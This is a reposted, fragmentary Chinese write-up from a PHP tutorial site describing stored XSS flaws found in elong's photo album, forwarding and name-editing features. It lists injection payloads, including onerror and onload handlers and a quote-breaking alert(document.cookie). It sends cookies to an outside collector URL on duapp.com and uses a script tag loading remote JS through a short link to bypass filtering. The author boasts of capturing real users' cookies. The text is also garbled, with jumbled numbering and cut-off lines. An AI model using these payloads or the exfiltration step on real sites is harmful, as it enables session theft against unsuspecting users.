来源:自学PHP网 时间:2015-04-17 12:00 作者: 阅读:次
[导读] 各种XSS详细说明:1. img src=1 onerror=alert(1);1) 位置:a) 相册b) 转发b) 转发c) 编辑名称2) 利用利用起来非常简单,前两个直接看了就被X,后面那个一个我们抓了一下包:上面的几个都非常...
各种XSS b) 转发 c) 编辑名称
2) 利用
1) 位置
b) 跑到编辑图片里面被X
2) 利用 3. ‘;alert(document.cookie);//
1) 位置 b) 里面:点进去看照片
2) 利用 http://kocteg.duapp.com/a.php?v=elong&c=’document.cookie’
只要妹子一点开这个相册,就被跨了。。。。
收到两条。。。因为duapp设置了啥啥啥,导致IP地址获取不到。。。
“和>木有过滤 2) 第二个:“ onload=”alert(1)”
“木有过滤
调用后单引号木有过滤 之前因为elong过滤了尖括号<>和script关键字,一直不能加载JS,只是通过GET传COOKIE而已,今天早上起来测试了一下成功绕过并加载JS 获得原来超过URL限制不能GET到的超长COOKIE <script/src=http://t.cn/zWEGaNi></script> " onload="h='<scr'
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com